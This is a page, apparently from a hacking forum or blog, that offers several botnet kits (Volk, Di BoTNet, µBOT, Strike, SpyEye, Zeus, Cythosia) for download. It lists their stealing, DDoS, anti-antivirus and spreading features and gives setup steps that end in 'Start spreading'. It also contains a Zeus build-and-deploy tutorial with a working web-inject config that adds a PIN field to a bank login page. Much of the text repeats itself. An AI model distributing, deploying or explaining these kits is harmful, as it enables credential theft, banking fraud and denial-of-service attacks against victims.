Volk botnet 4.0 (Source)
Some features:
Stealer
Pharming
Web Visit
Download & Execute
DDoS Attacks
Download https://mega.nz/#!LYViRKbR!VXsbKz_ZWAtx1bz8u56ScJRHsgtdzsifFDdW2ACmH_w
Wednesday, 3 February 2016
Di BoTNet v2.0 Zlo
Di BoTNet v2.0 Zlo
News:
+ Di BoTNet will now evolve in the direction of Public
Modules attack:
+ HTTP flood
+ SYN flood
+ DoWN flood
+ POST flood
+ AntiDDoS flood
Functionality:
+ NEW! System: The bot can not see in the system.
+ NEW! Detours: Boat bypasses most firewalls.
+ NEW! Defense: Not everyone is an experienced user will be able to remove the bot from the system.
+ NEW! ANTI-AV: If the bot is tapped out in Control Panel, antivirus can not remove it (80%).
+ Killer Unit: Boat destroys the competition.
+ UPDATE: The bot uses inzhekta to update the main module.
+ Many threading: Can attack simultaneously up to 300 target.
+ Reproduction: The bot itself is a function of distribution.
+ Statistics Today: Today statistics by country.
+ Statistics Online: Online statistics by country.
+ Anti virtualke: Bot does not work on virtual machines.
+ Anti Debugging: Can not ban the domain, the bot will live longer.
+ Productivity: The bot improved performance, better attacks, the system loads less.
+ Randomly: When you receive a random attack uses the full (but not chaotic requests) - HTTP 1.0 \ 2.0 \ 1.1; referee, etc.
Additional functions:
+ Streams: The number of threads during the attack indicated in the admin panel.
+ Interval: The interval is specified in the otstuk config.php, or in the admin panel.
+ Di BoTNet will now evolve in the direction of Public
Modules attack:
+ HTTP flood
+ SYN flood
+ DoWN flood
+ POST flood
+ AntiDDoS flood
Functionality:
+ NEW! System: The bot can not see in the system.
+ NEW! Detours: Boat bypasses most firewalls.
+ NEW! Defense: Not everyone is an experienced user will be able to remove the bot from the system.
+ NEW! ANTI-AV: If the bot is tapped out in Control Panel, antivirus can not remove it (80%).
+ Killer Unit: Boat destroys the competition.
+ UPDATE: The bot uses inzhekta to update the main module.
+ Many threading: Can attack simultaneously up to 300 target.
+ Reproduction: The bot itself is a function of distribution.
+ Statistics Today: Today statistics by country.
+ Statistics Online: Online statistics by country.
+ Anti virtualke: Bot does not work on virtual machines.
+ Anti Debugging: Can not ban the domain, the bot will live longer.
+ Productivity: The bot improved performance, better attacks, the system loads less.
+ Randomly: When you receive a random attack uses the full (but not chaotic requests) - HTTP 1.0 \ 2.0 \ 1.1; referee, etc.
Additional functions:
+ Streams: The number of threads during the attack indicated in the admin panel.
+ Interval: The interval is specified in the otstuk config.php, or in the admin panel.
Download https://mega.nz/#!eN12EByb!Pb9BWPkWg8LD-raot77NrFMrSDMX7RvBpcNxG68pKTI
[OPEN SOURCE] µBOT - HTTP Bot
µBOT - HTTP Bot - DL/Exec, Update, Visit, 10kb Bin
UBOT, originally named "Webnet", is a stable HTTP bot created for the use of cattle and is perfect for collecting hundereds and thousands of programs with an affordable price. The simple to use interfaceand reliable bot allows you to control your botnet with confidence, knowing your program is safe andstable is what botnet master's needs, and this is what we provide you with μBOT.
"Μ" in the name of our representative for simplicity and small size, which is directly in relation withour bot itself, with a 9kb small size compressor with control panel easy to use.
Bot:
- INSTANT Infection, no waiting.
- Download & Execute.
- Update.
- Visit Webpage [Visible].
- Visit Webpage [Invisible].
- Uninstall.
- Add to Startup.
- Critical Process.
- Hidden File.
- Admin detection.
- Mutex.
- Coded in VB6, no .NET Framework dependency!
- Small, ~10kb compressed, 36kb uncompressed.
- Great stability.
- INSTANT Infection, no waiting.
- Download & Execute.
- Update.
- Visit Webpage [Visible].
- Visit Webpage [Invisible].
- Uninstall.
- Add to Startup.
- Critical Process.
- Hidden File.
- Admin detection.
- Mutex.
- Coded in VB6, no .NET Framework dependency!
- Small, ~10kb compressed, 36kb uncompressed.
- Great stability.
Panel:
- Detailed statistics.
- Location plot, map graph.
- Pie Charts [Bot Status, Operating System, Admin].
- Tool-tip for last commands sent for each client.
- Bot selection preferences.
- Integrated Ajax, Means everything is realtime! From client list to bot count.
- Detailed statistics.
- Location plot, map graph.
- Pie Charts [Bot Status, Operating System, Admin].
- Tool-tip for last commands sent for each client.
- Bot selection preferences.
- Integrated Ajax, Means everything is realtime! From client list to bot count.
Instructions:
1. Upload the PHP Sauce to your webhost.
2. Create a MySQL Database.
3. Navigate on your webhosts FTP to root/inc/config.php .
4. Edit the details accordingly.
5. Import the MySQL configuration file called 'boatnet.sql' .
6. Build the VB6 side with corresponding panel.
7. Start spreading.
1. Upload the PHP Sauce to your webhost.
2. Create a MySQL Database.
3. Navigate on your webhosts FTP to root/inc/config.php .
4. Edit the details accordingly.
5. Import the MySQL configuration file called 'boatnet.sql' .
6. Build the VB6 side with corresponding panel.
7. Start spreading.
Now onto the cron job
The settings of the cron job is up to you it can vary between once a day to every 30 mins, i would personally recommend 30 mins because that is what the script is built for but aslong as you point the cron to
http://www.yourdomain.com/locationOfPanel/cron.php
youll be fine
The settings of the cron job is up to you it can vary between once a day to every 30 mins, i would personally recommend 30 mins because that is what the script is built for but aslong as you point the cron to
http://www.yourdomain.com/locationOfPanel/cron.php
youll be fine
Fixes:
having a problem with the function.date and getting errors like below?
having a problem with the function.date and getting errors like below?
Code:
Warning: date() [function.date]: It is not safe to rely on the system's timezone settings. You are *required* to use the date.timezone setting or the date_default_timezone_set() function. In case you used any of those methods and you are still getting this warning, you most likely misspelled the timezone identifier. We selected 'Europe/Berlin' for 'CEST/2.0/DST'
Warning: date() [function.date]: It is not safe to rely on the system's timezone settings. You are *required* to use the date.timezone setting or the date_default_timezone_set() function. In case you used any of those methods and you are still getting this warning, you most likely misspelled the timezone identifier. We selected 'Europe/Berlin' for 'CEST/2.0/DST'
there is a simple fix, go on the page you are getting the error such as tasks.php and after the initial php comment,place the following line
Code:
date_default_timezone_set('Europe/Berlin');
date_default_timezone_set('Europe/Berlin');
Download https://mega.nz/#!XMFn1bBL!ptM9psKKakV03tBOjXMzcfvUZiFb-AwAnWPlHBkM3BE
Strike Ultimate Botnet
Strike Ultimate Botnet
Strike botnet is a new advanced http based botnet with which you can literally control thousands of computers at the same time, without them even noticing.
With numerous functions and protection schemes it will stay undetected and undeletable in a hidden place on their computer. And that's only the ~60kb body of Strike. Strike also comes with a stunning web interface, allowing you to control all your bots from anywhere in the world with any OS you want.
Strike was written in Vb6 mixed with some inline Assembly and has an exe size of ~60kb. The bot comes with high-tech process and file protection and operates fully in ring 3. It has been tested and is fully working on Windows XP, Windows Vista and Windows 7!
[Functions]
+Active X startup
-Program is persistent and will run each time the computer starts
-Program is persistent and will run each time the computer starts
+Advanced Anti checking
-Different threads with continuous checks
-10 different methods
-Different threads with continuous checks
-10 different methods
+Attacking
-DDoS a webserver with a TCP connection flood which runs in the background
-DDoS a webserver with a TCP connection flood which runs in the background
+Firewall Bypass
-Add's itsself to the windows firewall
-Unhooks ring3 firewall hooks
-Add's itsself to the windows firewall
-Unhooks ring3 firewall hooks
+Process Protection
-An advanced protection system will keep the process from being closed
-An advanced protection system will keep the process from being closed
+File Protection
-Strike is protected from deletion, even if the process is not running
-Can't even be deleted by Rootkit Unhooker
-Strike is protected from deletion, even if the process is not running
-Can't even be deleted by Rootkit Unhooker
+Serial Stealing
-Strike can steal the windows serial code, among with more than 200 other serials
-Strike can steal the windows serial code, among with more than 200 other serials
+Sockets
-Strike uses API sockets to connect with the web interface
-It also uses the http protocol to bypass firewalls
-Strike uses API sockets to connect with the web interface
-It also uses the http protocol to bypass firewalls
+Spreading
-Strike has the ability to spread itsself into every compressed folder (zip/rar) on the infected computer
-Strike has the ability to spread itsself into every compressed folder (zip/rar) on the infected computer
+Msn passwords
-Strike is able to steal stored MSN passwords
-Strike is able to steal stored MSN passwords
+Internet Explorer
-Strike is also able to steal Internet Explorer passwords
-Strike is also able to steal Internet Explorer passwords
+Update
-Strike is also able to download a newer version and update itself
-Strike is also able to download a newer version and update itself
+Standard functions
-Exit, you can terminate strike with this command
-Melt, Strike can be fully removed from a computer
-Bsod, Strike can trigger a Blue Screen of Death
-Kill, Strike can delete files on the computer
-Exec, Execute files on the victims computer
-Down, Strike can download files from the web by using the HTTP protocol and can then execute them
-Exit, you can terminate strike with this command
-Melt, Strike can be fully removed from a computer
-Bsod, Strike can trigger a Blue Screen of Death
-Kill, Strike can delete files on the computer
-Exec, Execute files on the victims computer
-Down, Strike can download files from the web by using the HTTP protocol and can then execute them
+All these functions are called dynamical and are unhooked before being called!
Download https://mega.nz/#!OVdADCQA!T3FzbqS5k0A-CtvTtbNGMpIlER7ERFtsU4NWNYubPIk
SpyEye 1.3.45 + SpyEye 1.3.48 Full - All modules + Collector + Panel + Bc
Project Description:
SpyEye version 1.3.48 is private and more updated, this version will work and inject Firefox 13 (latest) and Internet Explorer 9 (Latest)
Need get full installation and your binary for spreding, you also have discounts on new injects and one free re installation
Once victim is infected, bot will inject fake browser content inside website like a form, once they fill in the form you get their data
Formgrabber is unique spyeye feature that allows you to steal form post data like VBV or MasterCard 3D passwords, as well as liberty reserve pins and login)
This includes all the newest software for:
[+] Admin Panel
[+] Formgrabber Panel
[+] Gate Installer
[+] Back Connect
[+] Collector
[+] Anti-Rapport (Anti-Thrusteer)
SpyEye version 1.3.48 is private and more updated, this version will work and inject Firefox 13 (latest) and Internet Explorer 9 (Latest)
Need get full installation and your binary for spreding, you also have discounts on new injects and one free re installation
Once victim is infected, bot will inject fake browser content inside website like a form, once they fill in the form you get their data
Formgrabber is unique spyeye feature that allows you to steal form post data like VBV or MasterCard 3D passwords, as well as liberty reserve pins and login)
This includes all the newest software for:
[+] Admin Panel
[+] Formgrabber Panel
[+] Gate Installer
[+] Back Connect
[+] Collector
[+] Anti-Rapport (Anti-Thrusteer)
Injection types:
[+] Internet Explorer
[+] FireFox
[+] Google Chrome
[+] Opera
Plugins:
[+] Custom Connector (to avoid that your admin panel is being tracked by Spyeyetracker)
[+] Webfakes
[+] RDP (Remote Desktop - Not tested yet)
[+] DDOS
[+] Block
[+] Billinghammer
[+] USB-Spread (not recommend that you use this, as it prompts the victim each time they boot their computer with an error - bad code)
[+] Socks5 Back Connect
[+] FTP Back Connect
[+] Bugreport
[+] CC-Grabber or
[+] Creditgrabber
[+] FFcertificate grabber
[+] SpySpread
Download https://mega.nz/#!mQVhwBzK!i3CH6RWXhFOfgR77iC50UjfnSqzE991lIif0REgezuU
Zeus Complete Tutorial | Building bot & Install Cpanel
Zeus Complete Tutorial | Building bot & Install Cpanel
Zeus Botnet Overview
Zeus is a toolkit that provides a malware creator all of the tools required to build and administer a botnet. The Zeus tools are primarily designed for stealing banking information, but they can easily be used for other types of data or identity theft. A Control Panel application is used to maintain/update the botnet, and to retrieve/organize recovered information. A configurable Builder tool allows to create the executables that will be used to infect victim’s computers. These executables are usually detected as ZBot by anti-virus software.
There is no single Zeus botnet. The toolkit is a commercial product that is sold to many different users, and distributed freely to many more. Each of them can create one or more botnets of their own, so the number of Zeus botnets is likely quite large.
The latest version of the toolkit typically sells for about $700 USD to trusted buyers, with the bot source code possibly available for a much larger sum. After a few months the new toolkit version is released as a free “public” version, which is probably meant to serve as a promotion for the commercial version. The public version may not include all of the latest functions, and the documentation is minimal. Modified versions of the public toolkit have also been offered for sale at lower prices by third party developers, sometimes known as “modders”.
Configuration and Bot Creation
The first step in building a bot executable is to edit the configuration file. The configuration tells the bot how to connect to the botnet, and it also contains information on what user data to gather and how to do so. The configuration file is in two parts, as described below.
Static Configuration
The StaticConfig is compiled into the bot by the Builder tool. It contains information that the bot will need when it is first executed. To update the StaticConfig the bots must be ordered to download a new bot version.
The available settings are:
The name of the botnet that this bot belongs to.
The amount of time to wait between dynamic configuration file downloads.
The time interval between uploads of logs and statistical information to the drop server.
The URL where the bot can get the dynamic config file.
A URL where the bot can check its own IP address, to determine if it is behind a router or firewall.
The encryption key that is used to hide information transmitted within the botnet.
A language ID list that tells the bot to go into a dormant state if the infected computer’s language is on the list.
The available settings are:
The name of the botnet that this bot belongs to.
The amount of time to wait between dynamic configuration file downloads.
The time interval between uploads of logs and statistical information to the drop server.
The URL where the bot can get the dynamic config file.
A URL where the bot can check its own IP address, to determine if it is behind a router or firewall.
The encryption key that is used to hide information transmitted within the botnet.
A language ID list that tells the bot to go into a dormant state if the infected computer’s language is on the list.
Dynamic Configuration
The DynamicConfig is downloaded by the bot immediately after it is installed on a victim’s computer. This file is downloaded at timed intervals by the bot, and can be used to change the behaviour of the botnet. Most of the entries control how information is collected from the infected computer.
Available settings include:
A URL where the bot can download a new version of itself, if the command to do so is given.
The URL of the drop server where logs, statistics and files will be uploaded and stored.
Information used to inject additional fields into web pages viewed from the infected computer.
A list of URLs where an emergency backup config file can be found.
A set of URL masks used to cause or prevent logging of information.
A set of URL masks to indicate that a screen image should be saved if the left mouse button is clicked.
A list of pairs of URLs that are used to cause redirection from the first URL to the second.
A set of URL masks used to collect TAN (Transaction Authentication) numbers – used by some banks for online authentication.
A list of IP/URL pairs that are inserted into the infected computer’s hosts file to override DNS lookups.
Available settings include:
A URL where the bot can download a new version of itself, if the command to do so is given.
The URL of the drop server where logs, statistics and files will be uploaded and stored.
Information used to inject additional fields into web pages viewed from the infected computer.
A list of URLs where an emergency backup config file can be found.
A set of URL masks used to cause or prevent logging of information.
A set of URL masks to indicate that a screen image should be saved if the left mouse button is clicked.
A list of pairs of URLs that are used to cause redirection from the first URL to the second.
A set of URL masks used to collect TAN (Transaction Authentication) numbers – used by some banks for online authentication.
A list of IP/URL pairs that are inserted into the infected computer’s hosts file to override DNS lookups.
Building the Bot
Once the configuration file is ready the Builder tool is used to build the encrypted dynamic configuration file and the bot executable file. The Builder first checks the computer it is running on to see if the Zeus bot is installed and gives the user the option to clean the system. This is probably meant to make it easier to test configuration settings. The Builder will then report system information as seen in Figure 1 below:
Figure 1: Zeus Builder – Information
Using the Builder, the aspiring botnet master can click the “Build config” button to compile the configuration file into its encrypted form. An option to edit here is also provided. When this file is ready it is placed on the server where the bots have been told to look for the DynamicConfig. Distributing the configuration file this way makes it easy to update the settings in the future. The image below shows the Builder output after the config has been built. If any error occurs during the build it is detailed here.
Figure 2: Zeus Builder – Compiling configuration
Then, by clicking the “Build loader” button, the distributable form of the bot executable can be assembled and saved. The button can be repeatedly pushed to produce internally identical bot executables with different encryption. The sizes of the PE file sections are also changed in each new build. The image below shows the information displayed by the Builder after the bot has been built.
Then, by clicking the “Build loader” button, the distributable form of the bot executable can be assembled and saved. The button can be repeatedly pushed to produce internally identical bot executables with different encryption. The sizes of the PE file sections are also changed in each new build. The image below shows the information displayed by the Builder after the bot has been built.
Figure 3: Zeus Builder – Assembling configuration and binary
Because new versions of the same bot configuration can easily be created it is fairly easy to keep enlarging the botnet when anti-virus software begins to detect the earlier versions.
Because new versions of the same bot configuration can easily be created it is fairly easy to keep enlarging the botnet when anti-virus software begins to detect the earlier versions.
Bot Distribution and Installation
The Zeus bot has no built-in capability to spread to other computers. In most cases a spam campaign is used to distribute it, either as an attached file or a link. Some type of social engineering within the spam message is used to trick the victims into executing the bot. A wide variety of these tricks have been seen, often in forms that are persuasive and difficult to detect. The large number of social engineering tricks is a result of many individuals attempting to seed their own botnet, using the common Zeus platform.
The lack of worm-like spreading capabilities makes the bot suitable for targeted attacks, since the bot is less visible and less likely to be detected. In targeted attacks, it can be sent to the intended victim in various disguises until success is achieved.
When the bot is executed on a victim’s computer it goes through a number of steps to install and configure itself, and to connect to the botnet. The filenames given here are for the tested version, and sometimes are changed in new versions. Outlined below are the steps taken upon initial execution:
The install function searches for the “winlogon.exe” process, allocates some memory within it and decrypts itself into the process.
The bot executable is written to the hard drive as “C:WINDOWSsystem32sdra64.exe“.
The directory “C:WINDOWSsystem32lowsec” is created. This directory is not visible in Windows Explorer but can be seen from the command line. Its purpose is to contain the following files:
local.ds: Contains the most recently downloaded DynamicConfig file.
user.ds: Contains logged information.
user.ds.lll: Temporarily created if transmission of logs to the drop server fails.
The Winlogon (“HKLM/SOFTWARE/Microsoft/WindowsNT/CurrentVersion/Winlogon“) registry key’s value is appended with the path of the bot executable: C:/WINDOWS/system32/sdra64.exe. This will cause the bot to execute when the computer restarts.
The Windows XP firewall is disabled. This causes a Windows Security Center warning icon to appear in the system tray, the only visible indication that the computer has been infected.
The bot broadcasts an “M-SEARCH” command to find UPnP network devices. This may be an attempt to access and reconfigure local routers.
The bot sends an HTTP GET command to the configured botnet server to get the latest DynamicConfig file.
The bot begins capturing and logging information from the infected computer. The DynamicConfig file largely determines what information is collected.
The bot sends two HTTP POST commands to upload log (user.ds) and stat information to the botnet drop server.
Three timers are set to values in the StaticConfig, each executing a function on time-out:
Get new config file (DynamicConfig) from server (default 60 minutes).
Post harvested data (user.ds) to server (default 1 minute).
Post statistics to server (default 20 minutes).
If a web page that is viewed from the infected computer is on the injection target list in the DynamicConfig, the additional fields from the list are injected into the page.
If the HTTP “200 OK” reply to a POST contains a hidden script command, the bot executes it and returns a success or failure indication along with any data (see Communication section below).
The lack of worm-like spreading capabilities makes the bot suitable for targeted attacks, since the bot is less visible and less likely to be detected. In targeted attacks, it can be sent to the intended victim in various disguises until success is achieved.
When the bot is executed on a victim’s computer it goes through a number of steps to install and configure itself, and to connect to the botnet. The filenames given here are for the tested version, and sometimes are changed in new versions. Outlined below are the steps taken upon initial execution:
The install function searches for the “winlogon.exe” process, allocates some memory within it and decrypts itself into the process.
The bot executable is written to the hard drive as “C:WINDOWSsystem32sdra64.exe“.
The directory “C:WINDOWSsystem32lowsec” is created. This directory is not visible in Windows Explorer but can be seen from the command line. Its purpose is to contain the following files:
local.ds: Contains the most recently downloaded DynamicConfig file.
user.ds: Contains logged information.
user.ds.lll: Temporarily created if transmission of logs to the drop server fails.
The Winlogon (“HKLM/SOFTWARE/Microsoft/WindowsNT/CurrentVersion/Winlogon“) registry key’s value is appended with the path of the bot executable: C:/WINDOWS/system32/sdra64.exe. This will cause the bot to execute when the computer restarts.
The Windows XP firewall is disabled. This causes a Windows Security Center warning icon to appear in the system tray, the only visible indication that the computer has been infected.
The bot broadcasts an “M-SEARCH” command to find UPnP network devices. This may be an attempt to access and reconfigure local routers.
The bot sends an HTTP GET command to the configured botnet server to get the latest DynamicConfig file.
The bot begins capturing and logging information from the infected computer. The DynamicConfig file largely determines what information is collected.
The bot sends two HTTP POST commands to upload log (user.ds) and stat information to the botnet drop server.
Three timers are set to values in the StaticConfig, each executing a function on time-out:
Get new config file (DynamicConfig) from server (default 60 minutes).
Post harvested data (user.ds) to server (default 1 minute).
Post statistics to server (default 20 minutes).
If a web page that is viewed from the infected computer is on the injection target list in the DynamicConfig, the additional fields from the list are injected into the page.
If the HTTP “200 OK” reply to a POST contains a hidden script command, the bot executes it and returns a success or failure indication along with any data (see Communication section below).
Botnet Command and Control
Control Panel Installation
The Zeus Control Panel application is mainly used to track the state of controlled botnets and to send script commands to the bots. It also provides an organized way to view and access information collected by the bots from infected computers.
The Control Panel is an open source PHP application that can be run on an IIS or Apache web server. Some additional software, most of which is specified in the documentation, is also required. A MySQL user with appropriate permissions must also be set up. When the system is ready the Control Panel code can be copied into the web server directory. The install page can then be accessed from a browser. If any errors are made when filling in this form, the user is given a helpful message. Once this form is completed the remainder of the setup is done automatically.
The Control Panel is an open source PHP application that can be run on an IIS or Apache web server. Some additional software, most of which is specified in the documentation, is also required. A MySQL user with appropriate permissions must also be set up. When the system is ready the Control Panel code can be copied into the web server directory. The install page can then be accessed from a browser. If any errors are made when filling in this form, the user is given a helpful message. Once this form is completed the remainder of the setup is done automatically.
Figure 4: Zeus Control – Installation configuration
Botnet Administration
After logging into the Control Panel, the initial page is displayed, as shown in Figure 5 below:
Figure 5: Zeus Control – Index
At the left is a menu where various pages can be accessed. At the right is a summary of information about the botnet. Notice that multiple versions of the bot can be administered with one version of the Control Panel. If the “OS” item on the menu is clicked we get a list of operating system versions in the network with a count of bots for each version. The next menu item is “Bots”, which initially displays the “Filter” form. Here the user can select “Inside NAT” or “Outside NAT”, “Online” or “Offline”, etc. to filter only the most interesting bots.
Figure 6: Zeus Control – Display Filter and Bot List
Clicking “Accept” results in a list that displays some basic information about each of the bots. The “Bot ID” is an automatically generated unique identifier for the bot. The “Comments” field shows any comments that have been added by the user. The “Bots action:” drop-down menu allows some more information to be obtained, for example the selected “Full information” option results in the additional details displayed in Figure 7. The user can add comments here, and the “Used” field can be set. The purpose of these seems to be to allow more exclusive filtering of the bots displayed on the list shown above.
Figure 7: Zeus Control – Full Information
The next item on the main menu is “Scripts”, which displays a list of scripts that have been set up by the user. These scripts are used to send one or more of the built-in commands to the bots (see Communications below).
Figure 8: Control Panel – Script List
Clicking on “Add New Script” or on one of the script names causes the edit dialog to be displayed. Here status of the script can be set to “Enabled”, so that it will be distributed the next time the bots check in. The range of distribution can be limited to one bot or one botnet, or to the listed countries. This is important for location based services (LBS). In the context field one or more script commands can be entered.
Clicking on “Add New Script” or on one of the script names causes the edit dialog to be displayed. Here status of the script can be set to “Enabled”, so that it will be distributed the next time the bots check in. The range of distribution can be limited to one bot or one botnet, or to the listed countries. This is important for location based services (LBS). In the context field one or more script commands can be entered.
Figure 9: Control Panel – Script Edit
If the script has been sent to any of the bots, an information box shows each successful transmission to a bot and whether it failed or was executed. Badly formed scripts fail at the bot, not at the Control Panel, which seems to do very little checking. Clicking the question mark next to “Context:” displays a list of currently available script commands with explanations. The commands can be used to collect more information, to make changes to the botnet or to give greater control of the infected computer.
If the script has been sent to any of the bots, an information box shows each successful transmission to a bot and whether it failed or was executed. Badly formed scripts fail at the bot, not at the Control Panel, which seems to do very little checking. Clicking the question mark next to “Context:” displays a list of currently available script commands with explanations. The commands can be used to collect more information, to make changes to the botnet or to give greater control of the infected computer.
Figure 10: Control Panel – Script Commands
The “Reports:” section of the main menu contains two options for handling information stolen from infected computers. Information other than files are put into the MySQL database, and can be viewed by clicking the “Search in database” option. The image below shows the search dialog and some information that has been found.
Figure 11: Control Panel – Database Search
Figure 12: Control Panel – Password Capture Report
Among the first items in the list are some with captured login information. An example of the details these entries contain can be seen in Figure 12. The second option in the “Reports:” section is “Search in files”. This is where files that are sent back from the bots can be found. As usual a search dialog is provided, because the number of files coming in from a large botnet will be very high.
Among the first items in the list are some with captured login information. An example of the details these entries contain can be seen in Figure 12. The second option in the “Reports:” section is “Search in files”. This is where files that are sent back from the bots can be found. As usual a search dialog is provided, because the number of files coming in from a large botnet will be very high.
Figure 13: Control Panel – Files Search Dialog
Figure 14: Control Panel – Files Search Results
Figure 13 shows an unrestricted search, with all the files that have been sent by the bots and the directory structure they are held in. There is a main directory for each bot. Screen captures are placed in a “screens” folder, under another folder named with the URL being viewed when they were captured. These are the screen captures made when the left mouse button is clicked. Certificate files that were captured when the getcerts command was given are located in the “certs” folder.
The file autorun.inf was uploaded using the command “getfile D:autorun.inf“, so it has been placed inside a folder named “D:“, based on its original path.
By clicking on a file name, any of the files can be downloaded or viewed. Alternatively, the checkboxes can be clicked for the items the user wants, and the “Create archive and download” option can be chosen under “Files action:”.
Under the “System:” section of the main menu, the “Information” item shows some version numbers for the Control Panel installation. The “Options” item allows changes to some setup options, including the botnet encryption key. Before the encryption key is changed, the bots must be ordered to download a new bot build with the new key.
Figure 13 shows an unrestricted search, with all the files that have been sent by the bots and the directory structure they are held in. There is a main directory for each bot. Screen captures are placed in a “screens” folder, under another folder named with the URL being viewed when they were captured. These are the screen captures made when the left mouse button is clicked. Certificate files that were captured when the getcerts command was given are located in the “certs” folder.
The file autorun.inf was uploaded using the command “getfile D:autorun.inf“, so it has been placed inside a folder named “D:“, based on its original path.
By clicking on a file name, any of the files can be downloaded or viewed. Alternatively, the checkboxes can be clicked for the items the user wants, and the “Create archive and download” option can be chosen under “Files action:”.
Under the “System:” section of the main menu, the “Information” item shows some version numbers for the Control Panel installation. The “Options” item allows changes to some setup options, including the botnet encryption key. Before the encryption key is changed, the bots must be ordered to download a new bot build with the new key.
Figure 15: Control Panel – System Options
Figure 16: Control Panel – User Options
Figure 16 shows the “User” item in the main menu, which allows password and language changes for the primary user. There is also an option to change the format of the screenshot images. The Control Panel provides a powerful and easy to use GUI interface for the botnet. Since Zeus is a commercial product, this kind of feature has the advantage of making it more desirable to prospective buyers, especially relatively non-technical buyers.
Figure 16 shows the “User” item in the main menu, which allows password and language changes for the primary user. There is also an option to change the format of the screenshot images. The Control Panel provides a powerful and easy to use GUI interface for the botnet. Since Zeus is a commercial product, this kind of feature has the advantage of making it more desirable to prospective buyers, especially relatively non-technical buyers.
Botnet Communications
All Zeus botnet communications pass between the bots and one or more servers. Only one physical server is needed, but additional ones can be used to distribute bot file updates and fallback configuration files.
Data sent through the Zeus botnet is encrypted with RC4 encryption. In this implementation a key stream is generated from the botnet password, and is XORed with the data. The same password is used to encrypt all data that is passed through the botnet. Changing the botnet password requires that all of the bot executables be updated to a build that includes the new password. The dynamic config file also must be updated and the server password changed from the Control Panel.
When a computer is infected with the Zeus bot, its first communication with the server is a request for the dynamic config file. Unlike other data sent through the network, the config file has already been encrypted by the Builder application and can be sent without further processing. Figure 17 shows the config file being requested by the bot, returned by the control server.
Data sent through the Zeus botnet is encrypted with RC4 encryption. In this implementation a key stream is generated from the botnet password, and is XORed with the data. The same password is used to encrypt all data that is passed through the botnet. Changing the botnet password requires that all of the bot executables be updated to a build that includes the new password. The dynamic config file also must be updated and the server password changed from the Control Panel.
When a computer is infected with the Zeus bot, its first communication with the server is a request for the dynamic config file. Unlike other data sent through the network, the config file has already been encrypted by the Builder application and can be sent without further processing. Figure 17 shows the config file being requested by the bot, returned by the control server.
Figure 17: The bot gets the dynamic config file
When the config file has been received, the bot will retrieve the drop server URL from it. The bot then HTTP POSTs some basic information about itself to the drop server, to log in and indicate that it is online. As long as it is running, the bot continues to HTTP POST encrypted logs and statistics to the server at timed intervals. By default logs are sent at 1 minute intervals and statistics are sent every 20 minutes.
Figure 18: The bot POSTs basic information
When a bot posts data to the server, the server replies with an HTTP/1.1 200 OK response. The Zeus server conceals an encrypted message as data within the response. This data field is used to send commands (scripts) to the bot. Below is an example of the default data when no command is being sent, which is the most common case.
When a bot posts data to the server, the server replies with an HTTP/1.1 200 OK response. The Zeus server conceals an encrypted message as data within the response. This data field is used to send commands (scripts) to the bot. Below is an example of the default data when no command is being sent, which is the most common case.
Figure 19: The server reply to the POST contains some data
When a command script is being sent by the server, the data size will be considerably larger than the standard response. Figure 20 shows a sent getfile command, resulting in 82 bytes of encrypted data.
When a command script is being sent by the server, the data size will be considerably larger than the standard response. Figure 20 shows a sent getfile command, resulting in 82 bytes of encrypted data.
Figure 20: The server reply to the POST contains a command
Web Page Injection
One important feature of the Zeus bot is its ability to dynamically inject dynamic into web pages viewed from an infected computer. This is done on-the-fly, as data passes from the server to the client browser. A snippet of the configuration data for this is shown below. It does a fairly straight forward search and insert operation:
set_url http://www.bank.com/login.html GP
data_before
name="password"*</tr>
data_end
data_inject
<tr><td>PIN:</td><td><input type="text" name="pinnumber" id="pinnumber" /></td></tr>
data_end
data_after
data_end
data_before
name="password"*</tr>
data_end
data_inject
<tr><td>PIN:</td><td><input type="text" name="pinnumber" id="pinnumber" /></td></tr>
data_end
data_after
data_end
The set_url parameter identifies the page to be attacked, data_before contains the text to search for before the injection point and data_inject has the text that will be injected. Figure 21 shows a login page before and after injection.
Figure 21: Login form before and after injection
This is a just simple demonstration. In practice more elaborate deceptions can be created, for example the injected changes could pretend to deny access and ask victims to confirm their identity by filling in additional fields. Below is the HTML source before injection. The data_before search text is highlighted.
<TR>
<TD>Username:</TD>
<TD><INPUT id=username name=username></TD></TR>
<TR>
<TD>Password:</TD>
<TD><INPUT type=password name=password></TD></TR>
<TR>
<TD colSpan=2><INPUT type=submit value=Submit></TD></TR>
<TD>Username:</TD>
<TD><INPUT id=username name=username></TD></TR>
<TR>
<TD>Password:</TD>
<TD><INPUT type=password name=password></TD></TR>
<TR>
<TD colSpan=2><INPUT type=submit value=Submit></TD></TR>
The following is the HTML source after injection, with the code inserted from the data_inject field discussed above.
<TR>
<TD>Username:</TD>
<TD><INPUT id=username name=username></TD></TR>
<TR>
<TD>Password:</TD>
<TD><INPUT type=password name=password></TD></TR>
<TR>
<TD>PIN:</TD>
<TD><INPUT id=pinnumber name=pinnumber></TD></TR>
<TR>
<TD colSpan=2><INPUT type=submit value=Submit></TD></TR>
<TD>Username:</TD>
<TD><INPUT id=username name=username></TD></TR>
<TR>
<TD>Password:</TD>
<TD><INPUT type=password name=password></TD></TR>
<TR>
<TD>PIN:</TD>
<TD><INPUT id=pinnumber name=pinnumber></TD></TR>
<TR>
<TD colSpan=2><INPUT type=submit value=Submit></TD></TR>
The currently distributed configuration file contains default settings for injection attacks on more than 100 URLs. A well executed attack can be very difficult for a victim to distinguish from a genuine web page.
Download https://mega.nz/#!eFMCARSY!kZrfystCCnTW21cNAdLRDt-bUOiCLbzyMLGlBjoi5gU
Cythosia v2 botnet full manual installation
Language: C# (2.0)
Developed by: Post.Mort3m
Developed by: Post.Mort3m
Current Version: 1.0.6
# Runs on Win2k - Win7 / x86 and x64
~ Limited/Guest/Administrator Acconts
# Various Autostart Names and Entries
Main Functions:
+ Download & Execute
+ Update
+ Update
Distributed Denial of Service Functions (DDoS)
+ Syn
~ 20 Bots can kill little Sites
~ Customizeable Port & Strength(Http, Sql, Gameserver)
+ UDP
~ Perform attacks on homeconnections
~ Highly customizeable
+ HTTP
~ Multithreaded GET Requests - Generates Traffic as hell
~ Keeps GET Requests open
~ 20 Bots can kill little Sites
~ Customizeable Port & Strength(Http, Sql, Gameserver)
+ UDP
~ Perform attacks on homeconnections
~ Highly customizeable
+ HTTP
~ Multithreaded GET Requests - Generates Traffic as hell
~ Keeps GET Requests open
Socks5 Proxy
+ Opens Port with UPnP if router supports it
+ Redirects all TCP requests multithreaded -> very good speed
+ Configureable Username and Password
+ Redirects all TCP requests multithreaded -> very good speed
+ Configureable Username and Password
Control Panel
